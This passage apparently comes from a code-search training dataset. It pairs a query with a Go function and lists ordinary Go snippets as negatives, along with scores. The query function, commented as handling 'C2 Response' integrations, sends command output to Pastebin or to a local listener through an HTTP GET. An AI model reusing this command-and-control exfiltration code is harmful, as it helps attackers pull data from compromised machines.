{\n\t\tseelog.Info(\"error: %v\", err)\n\t\treturn err\n\t}\n\treturn nil\n}", "func ParseCmd(fullCmd string) (string, []string, error) {\n\tvals := re.FindAllString(fullCmd, -1)\n\n\tif len(vals) == 0 {\n\t\treturn \"\", nil, &noCommandSpecified{}\n\t}\n\tcmd := vals[0]\n\tcmd, err := exec.LookPath(cmd)\n\tif err != nil {\n\t\treturn \"\", nil, err\n\t}\n\tif !filepath.IsAbs(cmd) {\n\t\tcmd, err = filepath.Abs(cmd)\n\t\tif err != nil {\n\t\t\treturn \"\", nil, err\n\t\t}\n\t}\n\n\targs := vals[1:]\n\t// remove single quotes from args, since they can confuse exec\n\tfor i, arg := range args {\n\t\targs[i] = strings.Trim(arg, \"'\")\n\t}\n\n\treturn cmd, args, nil\n}", "func (a *app) getCmd() (*exec.Cmd, error) {\n\tpath, err := exec.LookPath(a.bin)\n\tif err != nil {\n\t\tif path , err= exec.LookPath(os.Expand(a.bin, func(key string)string{\n\t\t\tif v,ok:=(*Env)[key];ok{\n\t\t\t\t\treturn v\n\t\t\t}else{\n\t\t\t\treturn \"\"\n\t\t\t}\n\t\t})); err!=nil{\n\t\t\treturn nil, fmt.Errorf(\"installing %v is in your future...\", a.bin)\n\t\t}\n\t}\n\tcmd := exec.Command(path, a.arg...)\n\tif a.dir != \"\" {\n\t\tcmd.Dir = a.dir\n\t}\n\n\tcmd.Env = Env.combine(append(a.env, os.Environ()...)).list()\n\tcmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr \n\n\n\tif len(Env.list())>0 {\n\t\tlogger.Printf(\"Env: %s\\n\", Env)\n\t}\n\tlogger.Printf(\"Command loaded: %s\\n\", a.cmd)\n\n\n\treturn cmd, nil\n}", "func main(){\n for _, url :=range os.Args[1:]{\n if !strings.HasPrefix(url, \"http\"){\n b := \"http://\"\n url = b + url\n }\n fmt.Println(url)\n resp, err := http.Get(url)\n if err != nil{\n fmt.Fprintf(os.Stderr, \"fetch:%v\\n\", err)\n os.Exit(1)\n }\n _ ,err = io.Copy(os.Stdout, resp.Body)\n resp.Body.Close()\n if err != nil{\n fmt.Fprintf(os.Stderr, \"fetch: reading %s: %v\\n\", url,err)\n os.Exit(1)\n }\n fmt.Printf(\"%v\",resp.Status)\n }\n}", "func ParseCommand(commandString string) PathCommand {\n\n\tswitch commandString {\n\tcase \"M\":\n\t\treturn MoveToAbsolute\n\tcase \"m\":\n\t\treturn MoveToRelative\n\tcase \"Z\", \"z\":\n\t\treturn ClosePath\n\tcase \"L\":\n\t\treturn LineToAbsolute\n\tcase \"l\":\n\t\treturn LineToRelative\n\tdefault:\n\t\treturn NotAValidCommand\n\t}\n\tpanic(\"Not reachable\")\n}", "func get_cmd() string {\n\tui := &input.UI{\n\t\tWriter: os.Stdout,\n\t\tReader: os.Stdin,\n\t}\n\tquery := \"Select option\"\n\tcmd, _ := ui.Select(query, []string{\"LIST\", \"INFO\", \"PLAY\", \"STOP\", \"QUIT\"}, &input.Options{\n\t\tLoop: true,\n\t})\n\treturn cmd\n}", "func (app *application) apiCmd(p *project, command apiCommand) (*response, error) {\n\n\tvar err error\n\tvar resp *response\n\n\tmethod := command.Method\n\tparams := command.Params\n\n\tswitch method {\n\tcase \"publish\":\n\t\tvar cmd publishApiCommand\n\t\terr := json.Unmarshal(params, &cmd)\n\t\tif err != nil {\n\t\t\tlogger.ERROR.Println(err)\n\t\t\treturn nil, ErrInvalidApiMessage\n\t\t}\n\t\tresp, err = app.publishCmd(p, &cmd)\n\tcase \"unsubscribe\":\n\t\tvar cmd unsubscribeApiCommand\n\t\terr := json.Unmarshal(params, &cmd)\n\t\tif err != nil {\n\t\t\tlogger.ERROR.Println(err)\n\t\t\treturn nil, ErrInvalidApiMessage\n\t\t}\n\t\tresp, err = app.unsubcribeCmd(p, &cmd)\n\tcase \"disconnect\":\n\t\tvar cmd disconnectApiCommand\n\t\terr := json.Unmarshal(params, &cmd)\n\t\tif err != nil {\n\t\t\tlogger.ERROR.Println(err)\n\t\t\treturn nil, ErrInvalidApiMessage\n\t\t}\n\t\tresp, err = app.disconnectCmd(p, &cmd)\n\tcase \"presence\":\n\t\tvar cmd presenceApiCommand\n\t\terr := json.Unmarshal(params, &cmd)\n\t\tif err != nil {\n\t\t\tlogger.ERROR.Println(err)\n\t\t\treturn nil, ErrInvalidApiMessage\n\t\t}\n\t\tresp, err = app.presenceCmd(p, &cmd)\n\tcase \"history\":\n\t\tvar cmd historyApiCommand\n\t\terr := json.Unmarshal(params, &cmd)\n\t\tif err != nil {\n\t\t\tlogger.ERROR.Println(err)\n\t\t\treturn nil, ErrInvalidApiMessage\n\t\t}\n\t\tresp, err = app.historyCmd(p, &cmd)\n\tdefault:\n\t\treturn nil, ErrMethodNotFound\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp, nil\n}", "func runList(cmd *cobra.Command, args []string) error {\n\tverb := \"GET\"\n\turl := \"/v1/query\"\n\n\tresp, err := web.Request(cmd, verb, url, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tcmd.Printf(\"\\n%s\\n\\n\", resp)\n\treturn nil\n}", "func httpGet(url string, details *RunDetails) string {\n\tfmt.Printf(\"INFO: Performing http get from '%s'\\n\", url)\n\ttimeout := 120\n\n\tval := details.Getenv(v1.EnvVarOperatorTimeout)\n\tif val != \"\" {\n\t\tt, err := strconv.Atoi(val)\n\t\tif err == nil {\n\t\t\ttimeout = t\n\t\t} else {\n\t\t\tfmt.Printf(\"ERROR: Invalid value set for %s '%s' using default of 120\\n\", v1.EnvVarOperatorTimeout, val)\n\t\t}\n\t}\n\n\tclient := http.Client{\n\t\tTimeout: time.Duration(timeout) * time.Second,\n\t}\n\n\tresp, err := client.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"ERROR: failed to get url %s - %s\\n\", url, err.Error())\n\t\treturn \"\"\n\t}\n\t//noinspection GoUnhandledErrorResult\n\tdefer resp.Body.Close()\n\n\tif resp.StatusCode != 200 {\n\t\tfmt.Printf(\"ERROR: filed to get 200 response from %s - %s\\n\", url, resp.Status)\n\t\treturn \"\"\n\t}\n\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tfmt.Printf(\"ERROR: filed to read response body from %s - %s\\n\", url, resp.Status)\n\t\treturn \"\"\n\t}\n\n\ts := string(body)\n\tfmt.Printf(\"INFO: Get response from '%s' was '%s'\\n\", url, s)\n\treturn s\n}", "func getCommand( )*string {\n\n\tvar inputCommand string \t\t// define variable to store inputCommand\n\n\tfmt.Scanln(&inputCommand) \t\t// stores character from user\n\n\treturn &inputCommand \t\t\t// returns users character\n}", "func Cmd(dir string, command string) *exec.Cmd {\n\tparts := strings.Split(command, \" \")\n\tcmd := exec.Command(parts[0], parts[1:]...)\n\tcmd.Dir = dir\n\treturn cmd\n}", "func (d *Device) BuildCommandURL(commandID string) (string, *nerr.E) {\n\tfindCommand := func(id string, commands []Command) *Command {\n\t\tfor i := range commands {\n\t\t\tif id == commands[i].ID {\n\t\t\t\treturn &commands[i]\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\tcommand := findCommand(commandID, d.Type.Commands)\n\tif command == nil {\n\t\treturn \"\", nerr.Createf(\"error\", \"unable to build command address: no command with id '%s' found on %s\", commandID, d.ID)\n\t}\n\n\turl, err := url.Parse(fmt.Sprintf(\"%s%s\", command.Microservice.Address, command.Endpoint.Path))\n\tif err != nil {\n\t\treturn \"\", nerr.Translate(err).Addf(\"unable to build command address\")\n\t}\n\t// match the first command\n\tfor reg, proxy := range d.Proxy {\n\t\tr, err := regexp.Compile(reg)\n\t\tif err != nil {\n\t\t\treturn \"\", nerr.Translate(err).Addf(\"unable to build command address\")\n\t\t}\n\n\t\tif r.MatchString(commandID) {\n\t\t\t// use this proxy\n\t\t\tvar host strings.Builder\n\n\t\t\toldhost := strings.Split(url.Host, \":\")\n\t\t\tnewhost := strings.Split(proxy, \":\")\n\n\t\t\tswitch len(newhost) {\n\t\t\tcase 1: // no port on the proxy url\n\t\t\t\thost.WriteString(newhost[0])\n\n\t\t\t\t// add on the old port if there was one\n\t\t\t\tif len(oldhost) > 1 {\n\t\t\t\t\thost.WriteString(\":\")\n\t\t\t\t\thost.WriteString(oldhost[1])\n\t\t\t\t}\n\t\t\tcase 2: // port present on proxy url\n\t\t\t\thost.WriteString(newhost[0])\n\t\t\t\thost.WriteString(\":\")\n\t\t\t\thost.WriteString(newhost[1])\n\t\t\tdefault:\n\t\t\t\treturn \"\", nerr.Createf(\"error\", \"unable to build command address: invalid proxy value '%s' on %s\", proxy, d.ID)\n\t\t\t}\n\n\t\t\turl.Host = host.String()\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn url.String(), nil\n}", "func (r *Router) GetCommand(name string) (c *Command) {\n\tfor _, cmd := range r.Commands {\n\t\tif strings.ToLower(cmd.Name) == strings.ToLower(name) {\n\t\t\treturn cmd\n\t\t}\n\t\tfor _, a := range cmd.Aliases {\n\t\t\tif strings.ToLower(a) == strings.ToLower(name) {\n\t\t\t\treturn cmd\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func (c *Command) Get(path []string) (*Command, error) {\n\tcmds, err := c.Resolve(path)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn cmds[len(cmds)-1], nil\n}", "func listCommandFunc(cmd *cobra.Command, args []string) {\n\turl := fmt.Sprintf(\"http://%s%s\", Global.Endpoints, proxy.APIProxies)\n\tcli := &http.Client{}\n\trsp, err := cli.Get(url)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tdefer rsp.Body.Close()\n\t\tdata, err := ioutil.ReadAll(rsp.Body)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t} else {\n\t\t\tfmt.Printf(\"%s\\n\", data)\n\t\t}\n\t}\n}", "func AgentCommand(arga string, argb string, ipaddress string) (string, error) {\n\tclient, err := rpc.DialHTTP(\"tcp\", ipaddress+\":13000\")\n\tif err != nil {\n\t\tlogit.Error.Println(\"AgentCommand: dialing:\" + err.Error())\n\t}\n\tif client == nil {\n\t\tlogit.Error.Println(\"AgentCommand: dialing: client was nil\")\n\t\treturn \"\", errors.New(\"client was nil\")\n\t}\n\n\tvar command Command\n\n\targs := &Args{}\n\targs.A = util.GetBase() + \"/bin/\" + arga\n\targs.B = argb\n\terr = client.Call(\"Command.Get\", args, &command)\n\tif err != nil {\n\t\tlogit.Error.Println(\"AgentCommand:\" + arga + \" Command Get error:\" + err.Error())\n\t\treturn \"\", err\n\t}\n\treturn command.Output, nil\n}", "func (i FakeInvoke) Command(name string, arg ...string) ([]byte, error) {\n\tif i.Error != nil {\n\t\treturn []byte{}, i.Error\n\t}\n\n\tarch := runtime.GOOS\n\n\tcommandName := filepath.Base(name)\n\n\tfname := strings.Join(append([]string{commandName}, arg...), \"\")\n\tfname = url.QueryEscape(fname)\n\tfpath := path.Join(\"testdata\", arch, fname)\n\tif i.Suffix != \"\" {\n\t\tfpath += \"_\" + i.Suffix\n\t}\n\tif PathExists(fpath) {\n\t\treturn os.ReadFile(fpath)\n\t}\n\treturn []byte{}, fmt.Errorf(\"could not find testdata: %s\", fpath)\n}", "func (r *Rule) GetCommand() (command string, args []string) {\n\tcommand = r.Command\n\targs = r.Args\n\n\treturn\n}", "func GetCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"ransim {get,set,create,delete,starts,stop,load,clear} [args]\",\n\t\tShort: \"ONOS RAN simulator commands\",\n\t}\n\n\tcli.AddConfigFlags(cmd, defaultAddress)\n\tcmd.AddCommand(cli.GetConfigCommand())\n\n\tcmd.AddCommand(getCreateCommand())\n\tcmd.AddCommand(getDeleteCommand())\n\tcmd.AddCommand(getGetCommand())\n\tcmd.AddCommand(getSetCommand())\n\n\tcmd.AddCommand(startNodeCommand())\n\tcmd.AddCommand(stopNodeCommand())\n\n\tcmd.AddCommand(loadCommand())\n\tcmd.AddCommand(clearCommand())\n\n\tcmd.AddCommand(loglib.GetCommand())\n\treturn cmd\n}", "func runCommand(query string) ([]byte, error) {\n\tpath, err := os.Getwd()\n\tif err != nil {\n\t\treturn []byte{}, err\n\t}\n\tcmd := fmt.Sprintf(\"%s/dasgoclient\", path)\n\tout, err := exec.Command(cmd, \"-query\", query, \"-format\", \"json\").Output()\n\treturn out, err\n}", "func Command() *cobra.Command {\n\tvar cmd = &cobra.Command{\n\t\tUse: \"exec <namespace> <label>\",\n\t\tShort: \"Open a terminal inside a container\",\n\t\tLong: `Open a terminal in a specific namespace label.`,\n\t\tArgs: func(cmd *cobra.Command, args []string) error {\n\t\t\tif len(os.Args) < 4 {\n\t\t\t\treturn fmt.Errorf(\"%s\", \"arguments wrong\")\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tnamespace := os.Args[2]\n\t\t\tlabel := os.Args[3]\n\t\t\texec(namespace, label)\n\t\t},\n\t}\n\n\treturn cmd\n}", "func (conn Connection) Get(cmd string, result interface{}) (resp *http.Response, err error) {\n\treturn conn.Send(http.MethodGet, cmd, nil, result)\n}", "func (y *Yeelight) CronGet(t string) string {\n\tcmd := `{\"id\":13,\"method\":\"cron_get\",\"params\":[` + t + `]}`\n\treturn y.request(cmd)\n}" ]
[ "0.60393023", "0.5802094", "0.57980025", "0.5758753", "0.5711014", "0.5705281", "0.5555327", "0.55422115", "0.5518817", "0.5489269", "0.54817235", "0.545761", "0.544544", "0.5425744", "0.5398279", "0.5390307", "0.5382872", "0.53396654", "0.528128", "0.5281061", "0.52809036", "0.5280889", "0.52750546", "0.5230122", "0.51889163", "0.5186775", "0.5172965", "0.5153033", "0.51348037", "0.5101657", "0.50871253", "0.50854146", "0.50799036", "0.5075292", "0.50607026", "0.5049328", "0.5043434", "0.5037154", "0.5030371", "0.5017218", "0.50151604", "0.5010362", "0.5004029", "0.4987755", "0.49773943", "0.49746004", "0.49737203", "0.49634328", "0.49600554", "0.49597773", "0.495616", "0.4945201", "0.49405345", "0.49385166", "0.4933618", "0.49256212", "0.4913354", "0.49123606", "0.49083737", "0.49074495", "0.48909125", "0.48853347", "0.48796973", "0.48751605", "0.48726156", "0.48647144", "0.48628142", "0.4857129", "0.4855829", "0.4854381", "0.4850633", "0.4840098", "0.48342764", "0.48333606", "0.48304376", "0.48265696", "0.48252258", "0.48215118", "0.4816815", "0.48147398", "0.48143503", "0.4804668", "0.48043558", "0.4803024", "0.48009443", "0.48004004", "0.47952768", "0.47951332", "0.4781804", "0.47724676", "0.47652978", "0.47563568", "0.4755279", "0.47513798", "0.47493932", "0.4749117", "0.47484028", "0.4746877", "0.47459087", "0.47438598" ]
0.6932481
0
This function is for handling all C2 Response intergations, by default it will publish a GET Request to a given URL string unless another flag is set.
func SendResponse(output string) (int){ // Flag to tell output to be directed to the Pastebin intergration const pb_Flag bool = false if pb_Flag{ SendtoPB(output) }else{ url := "http://127.0.0.1:8080/" + url.PathEscape(output) _, err := http.Get(url) if err != nil { //log.Fatalln(err) return 0 } } return 0 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func HitURL2(url string, c chan ResponseResult) {\n\tresp, err := http.Get(url)\n\n\tstatus := \"OK\"\n\n\tcode := resp.StatusCode\n\n\tif err != nil || code >= 400 {\n\t\tstatus = \"FAILED\"\n\t}\n\n\tc <- ResponseResult{url: url, status: status, code: code}\n}", "func urlHandler(w http.ResponseWriter, r *http.Request) {\n if !customChannelSet {\n clientUrl = uniuri.NewLen(5)\n }\n customChannelSet = false\n clientUrlJSON, _ := json.Marshal(clientUrl)\n\n fmt.Println(\"Sending custom URL:\", clientUrl)\n w.Header().Set(\"Content-Type\", \"application/json\")\n w.WriteHeader(200)\n fmt.Fprintf(w, \"%s\", clientUrlJSON)\n}", "func HandleQuoteRequest(responseWrite http.ResponseWriter, request *http.Request) {\n log.Println(\"Got request!\")\n resp, err := http.Get(\"http://inspireme.ranjithzachariah.com\")\n //resp, err := http.Get(\"https://google.com\")\n if err != nil {\n fmt.Fprintf(responseWrite, \"Error connecting to InspireMe server %s\", err)\n } else {\n htmlData, _ := ioutil.ReadAll(resp.Body)\n fmt.Fprintf(responseWrite, string(htmlData)) \n }\n}", "func onGetVisits(w http.ResponseWriter, r *http.Request) {\n\tvalues := r.URL.Query()\n\tshortURL, ok := values[\"shortURL\"]\n\tkey, ok1 := values[\"key\"]\n\tuserName, ok2 := values[\"userName\"]\n\tif (ok1 == true && ok2 == true) && (len(key) >= 1) && (len(userName) >= 1) { // validating values\n\t\tif ValidateAPIKey(key[0], userName[0]) == false {\n\t\t\tresponseToCLient(w, \"Wrong or expired key\")\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tresponseToCLient(w, \"Please check the request parameters\")\n\t\treturn\n\t}\n\tif ok {\n\t\tw.WriteHeader(http.StatusOK)\n\t\tif len(shortURL) >= 1 {\n\t\t\tcorrectURL, err := url.ParseRequestURI(shortURL[0])\n\t\t\tif err != nil {\n\t\t\t\tresponseToCLient(w, \"Please enter the correct and complete url, example - http://google.com\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"host \" + correctURL.Host)\n\t\t\t\tif correctURL.Host != \"mydomain.com\" { // checking whether this url is from our domain\n\t\t\t\t\tresponseToCLient(w, \"Not the correct short link provided by mydomain.com\")\n\t\t\t\t} else {\n\t\t\t\t\ta := correctURL.Path[1:] // removing first '/' from rest of the path\n\t\t\t\t\tstr, _ := getCounter(a)\n\t\t\t\t\tresponseToCLient(w, \"Total Visits : \"+str)\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tresponseToCLient(w, \"Please check the request parameters\")\n\t\t}\n\t} else {\n\t\tresponseToCLient(w, \"No shortURL found, Please check the request parameters\")\n\t}\n\n}", "func ServeResponse(\n\tres http.ResponseWriter,\n\treq *http.Request,\n\tretriever types.RetrieverResponsePropertiesInterface,\n\tcallback func(http.ResponseWriter, *http.Request, types.RetrieverResponsePropertiesInterface, RequestCoalescingInterface, func(http.ResponseWriter, *http.Request) error),\n\trc RequestCoalescingInterface,\n\tnm func(w http.ResponseWriter, r *http.Request) error,\n) {\n\tpath := req.Host + req.URL.Path\n\tregexpURL := retriever.GetRegexpUrls().FindString(path)\n\turl := configurationtypes.URL{\n\t\tTTL: configurationtypes.Duration{Duration: retriever.GetConfiguration().GetDefaultCache().GetTTL()},\n\t\tHeaders: retriever.GetConfiguration().GetDefaultCache().GetHeaders(),\n\t}\n\tif \"\" != regexpURL {\n\t\tu := retriever.GetConfiguration().GetUrls()[regexpURL]\n\t\tif u.TTL.Duration != 0 {\n\t\t\turl.TTL = u.TTL\n\t\t}\n\t\tif len(u.Headers) != 0 {\n\t\t\turl.Headers = u.Headers\n\t\t}\n\t}\n\tretriever.GetTransport().SetURL(url)\n\tretriever.SetMatchedURL(url)\n\n\theaders := \"\"\n\tif retriever.GetMatchedURL().Headers != nil && len(retriever.GetMatchedURL().Headers) > 0 {\n\t\tfor _, h := range retriever.GetMatchedURL().Headers {\n\t\t\theaders += strings.ReplaceAll(req.Header.Get(h), \" \", \"\")\n\t\t}\n\t}\n\n\tcallback(res, req, retriever, rc, nm)\n}", "func GetShortURLHandler(response http.ResponseWriter, request *http.Request) {\n\ttype URLRequestObject struct {\n\t\tURL string `json:\"url\"`\n\t}\n\ttype URLCollection struct {\n\t\tActualURL string\n\t\tShortURL string\n\t}\n\ttype SuccessResponse struct {\n\t\tCode int\n\t\tMessage string\n\t\tResponse URLCollection\n\t}\n\tvar urlRequest URLRequestObject\n\tvar httpError = ErrorResponse{\n\t\tCode: http.StatusInternalServerError, Message: \"Something went wrong at our end\",\n\t}\n\n\tdecoder := json.NewDecoder(request.Body)\n\terr := decoder.Decode(&urlRequest)\n\n\tif err != nil {\n\t\thttpError.Message = \"URL can't be empty\"\n\t\treturnErrorResponse(response, request, httpError)\n\t} else if !isURL(urlRequest.URL) {\n\t\thttpError.Message = \"An invalid URL found, provide a valid URL\"\n\t\treturnErrorResponse(response, request, httpError)\n\t} else {\n\t\tuniqueID, idError := shortid.Generate()\n\t\tif idError != nil {\n\t\t\treturnErrorResponse(response, request, httpError)\n\t\t} else {\n\t\t\terr := Client.Set(uniqueID, urlRequest.URL, 0).Err()\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err)\n\t\t\t\treturnErrorResponse(response, request, httpError)\n\t\t\t}\n\t\t\tvar successResponse = SuccessResponse{\n\t\t\t\tCode: http.StatusOK,\n\t\t\t\tMessage: \"Short URL generated\",\n\t\t\t\tResponse: URLCollection{\n\t\t\t\t\tActualURL: urlRequest.URL,\n\t\t\t\t\tShortURL: request.Host + \"/\" + uniqueID,\n\t\t\t\t},\n\t\t\t}\n\t\t\tjsonResponse, err := json.Marshal(successResponse)\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t\tresponse.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\tresponse.WriteHeader(successResponse.Code)\n\t\t\tresponse.Write(jsonResponse)\n\t\t}\n\t}\n}", "func (r *Responder) RequestURITooLong() { r.write(http.StatusRequestURITooLong) }", "func HTTPNonUeN2MessageTransfer(c *gin.Context) {\n\tlogger.CommLog.Warnf(\"Handle Non Ue N2 Message Transfer is not implemented.\")\n\tc.JSON(http.StatusOK, gin.H{})\n}", "func (f *Fetcher) visit(cmd Command, response *http.Response, err error, isCached bool) (restartClient bool) {\n restartClient = false\n\n defer func() {\n if response != nil && response.Body != nil {\n response.Body.Close()\n }\n }()\n hasErrors, brokenMirror, brokenUrl := f.ErrorHandler(response, err, cmd)\n if hasErrors {\n logs.Debug(\"🔥 Error with Url: %s proxy: %s Error: %v\", cmd.MirrorUrl(), cmd.HttpClient().ProxyURL, err)\n if brokenMirror {\n restartClient = true\n }\n if brokenUrl { // too many failures for this Url\n if err != nil && err != ErrDisallowed {\n logs.Error(\"🔥 Url %s keeps failing, Error: %v\", cmd.Url(), err)\n }\n return\n } else if f.LogLevel < logs.LevelNotice {\n fmt.Print(\"🔥\")\n }\n if !isCached {\n cmd.SetHttpClient(nil) // make it light for the queue\n f.queue.Send(cmd)\n }\n return\n }\n\n var document *goquery.Document\n if strings.Contains(response.Header.Get(\"content-type\"), \"text\") {\n logs.Info(\"Parsing Url %s\", cmd.Url())\n var body io.Reader\n if f.DecodeCharset != \"\" && f.DecodeCharset != \"utf-8\" {\n e, err := htmlindex.Get(f.DecodeCharset)\n if err != nil {\n go f.exception(\"Could not find decoding charset \" + f.DecodeCharset + \" \" + err.Error() + \" \" + cmd.Url().String())\n return\n }\n body = e.NewDecoder().Reader(response.Body)\n } else {\n body = response.Body\n }\n document, err = goquery.NewDocumentFromReader(body)\n if err != nil {\n logs.Error(\"Error parsing html %s %s - %s\", cmd.Method(), cmd.Url(), err)\n return\n }\n if f.KeepCrawling {\n f.enqueueLinks(cmd.MirrorUrl(), document)\n }\n }\n\n logs.Info(\"Passing to handler Url %s\", cmd.Url())\n if f.Handler != nil {\n f.Handler(document, cmd, response, err)\n }\n\n return\n\n}", "func compactGET(\n\thttpClient *fasthttp.Client, uri string, options ...func(*fasthttp.Request, *fasthttp.Response),\n) (response *fasthttp.Response, finalErr error) {\n\trequest := fasthttp.AcquireRequest()\n\tresponse = fasthttp.AcquireResponse()\n\tdefer fasthttp.ReleaseRequest(request)\n\n\t// apply functional options modifiers\n\tfor _, option := range options {\n\t\toption(request, response)\n\t}\n\n\trequest.Header.SetMethod(\"GET\")\n\trequest.SetRequestURI(uri)\n\n\terr := httpClient.Do(request, response)\n\tif err != nil {\n\t\t// assume no releasing request needed\n\t\treturn nil, err\n\t}\n\n\treturn response, finalErr\n}", "func first(w http.ResponseWriter,r *http.Request){\n\tif r.Method == \"GET\"{\n\t\tsendRes(202,Example,w)\n\t}\n}", "func httpHandler(resp http.ResponseWriter, req *http.Request) {\n\tdefer handlePanic(resp, http.StatusInternalServerError)\n\n\tvar err error\n\tswitch req.URL.Path {\n\tcase \"/versions\":\n\t\t{\n\t\t\tswitch req.Method {\n\t\t\tcase \"GET\":\n\t\t\t\t{\n\t\t\t\t\tincludes := NewIncludes(req.URL.Query())\n\n\t\t\t\t\tvar status *Status\n\t\t\t\t\tif status, err = NewStatus(includes); err == nil {\n\t\t\t\t\t\tvar bytes []byte\n\t\t\t\t\t\tif bytes, err = json.Marshal(status); err == nil {\n\t\t\t\t\t\t\t// First, add the headers as the Write will start streaming right away.\n\t\t\t\t\t\t\tresp.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\t\t\t\t\tresp.Header().Set(\"Cache-Control\", \"no-cache\")\n\n\t\t\t\t\t\t\t// TODO: we may need to remove the \\u0001 and \\u0002 from the\n\t\t\t\t\t\t\t// result because this was a hack to sort the labels\n\t\t\t\t\t\t\t// correctly. The SVG though doesn't mind.\n\n\t\t\t\t\t\t\t_, err = resp.Write(bytes)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\tdefault:\n\t\terr = errors.New(\"Unknown route.\")\n\t}\n\n\tif err != nil {\n\t\tresp.WriteHeader(http.StatusBadRequest)\n\t\tresp.Write([]byte(err.Error()))\n\t}\n}", "func onGetShortLink(w http.ResponseWriter, r *http.Request) {\n\tvalues := r.URL.Query()\n\tlongURL, ok := values[\"longURL\"]\n\tif ok {\n\t\tw.WriteHeader(http.StatusOK)\n\t\tif len(longURL) >= 1 {\n\t\t\tfmt.Println(longURL[0])\n\t\t\t_, err := url.ParseRequestURI(longURL[0]) // trying to parse string to proper URL\n\t\t\tif err != nil {\n\t\t\t\tresponseToCLient(w, \"Please enter the correct and complete url, example - http://google.com\")\n\t\t\t} else {\n\t\t\t\tshortUrl, ok := getShortURL(longURL[0])\n\t\t\t\tif ok {\n\t\t\t\t\tresponseToCLient(w, \"Your Short URL is : http://mydomain.com/\"+shortUrl) // responding with short link by attaching demo domain\n\t\t\t\t} else {\n\t\t\t\t\tresponseToCLient(w, \"Please check the request parameters\")\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tresponseToCLient(w, \"Please check the request parameters\")\n\t\t}\n\t} else {\n\t\tresponseToCLient(w, \"No longURL found, Please check the request parameters\")\n\t}\n}", "func (a *aboutEndpoint) HandleGET(w http.ResponseWriter, r *http.Request, resources []string) {\n\n\tdata := map[string]interface{}{\n\t\t\"product\": \"RUFS\",\n\t\t\"version\": config.ProductVersion,\n\t}\n\n\t// Write data\n\n\tw.Header().Set(\"content-type\", \"application/json; charset=utf-8\")\n\n\tret := json.NewEncoder(w)\n\tret.Encode(data)\n}", "func (z *Zoidberg) getIt(t *testing.T, req *http.Request, reqBody interface{}, resp *http.Response, body []byte, r Request) {\n\tquery := \"\"\n\tif req.URL.RawQuery != \"\" {\n\t\tquery = fmt.Sprintf(\"?%s\", req.URL.RawQuery)\n\t}\n\tfmt.Fprintf(z.w, \".. http:%s:: %s\\n\\n\", strings.ToLower(req.Method), req.URL.Path)\n\tfmt.Fprintf(z.w, \" %s\\n\\n\", r.Description)\n\n\t// Write in the response codes\n\tif r.ResponseCodes != nil {\n\t\tresponseCodesOrdered := []int{}\n\t\tfor k := range r.ResponseCodes {\n\t\t\tresponseCodesOrdered = append(responseCodesOrdered, k)\n\t\t}\n\t\tsort.Ints(responseCodesOrdered)\n\t\tfmt.Fprintf(z.w, \" **Response Code**\\n\\n\")\n\t\tfor _, code := range responseCodesOrdered {\n\t\t\tfmt.Fprintf(z.w, \" - %d: %s\\n\\n\", code, r.ResponseCodes[code])\n\t\t}\n\t}\n\tfmt.Fprintf(z.w, \"\\n\\n\")\n\n\t// Write in the parameters\n\tif r.ParameterValues != nil {\n\t\tparameterValuesOrdered := []string{}\n\t\tfor k := range r.ParameterValues {\n\t\t\tparameterValuesOrdered = append(parameterValuesOrdered, k)\n\t\t}\n\t\tsort.Strings(parameterValuesOrdered)\n\t\tfmt.Fprintf(z.w, \" **Query Parameters**\\n\\n\")\n\t\tfor _, param := range parameterValuesOrdered {\n\t\t\tfmt.Fprintf(z.w, \" - **%s**: %s\\n\\n\", param, r.ParameterValues[param])\n\t\t}\n\t}\n\tfmt.Fprintf(z.w, \"\\n\\n\")\n\n\t// Write in the response codes\n\tif r.ResponseJSONObjects != nil {\n\t\tresponseJSONObjectsOrdered := []string{}\n\t\tfor k := range r.ResponseJSONObjects {\n\t\t\tresponseJSONObjectsOrdered = append(responseJSONObjectsOrdered, k)\n\t\t}\n\t\tsort.Strings(responseJSONObjectsOrdered)\n\t\tfmt.Fprintf(z.w, \" **Response JSON Object**\\n\\n\")\n\t\tfor _, code := range responseJSONObjectsOrdered {\n\t\t\tfmt.Fprintf(z.w, \" - **%s**: %s\\n\\n\", code, r.ResponseJSONObjects[code])\n\t\t}\n\t}\n\tfmt.Fprintf(z.w, \"\\n\\n\")\n\n\tfmt.Fprintf(z.w, \" Example request:\\n\\n\")\n\tfmt.Fprintf(z.w, \" .. sourcecode:: http\\n\\n\")\n\tfmt.Fprintf(z.w, \" %s %s%s %s\\n\", req.Method, req.URL.Path, query, req.Proto)\n\tfor k := range req.Header {\n\t\tfmt.Fprintf(z.w, \" %s: %s\\n\", k, req.Header.Get(k))\n\t}\n\n\tif reqBody != nil {\n\t\tb, err := json.MarshalIndent(reqBody, \" \", \" \")\n\t\trequire.NoError(t, err)\n\t\tfmt.Fprintf(z.w, \"\\n\")\n\t\tfmt.Fprintf(z.w, \" %s\\n\\n\", b)\n\t}\n\n\tfmt.Fprintf(z.w, \"\\n\")\n\tfmt.Fprintf(z.w, \" Example response:\\n\\n\")\n\tfmt.Fprintf(z.w, \" .. 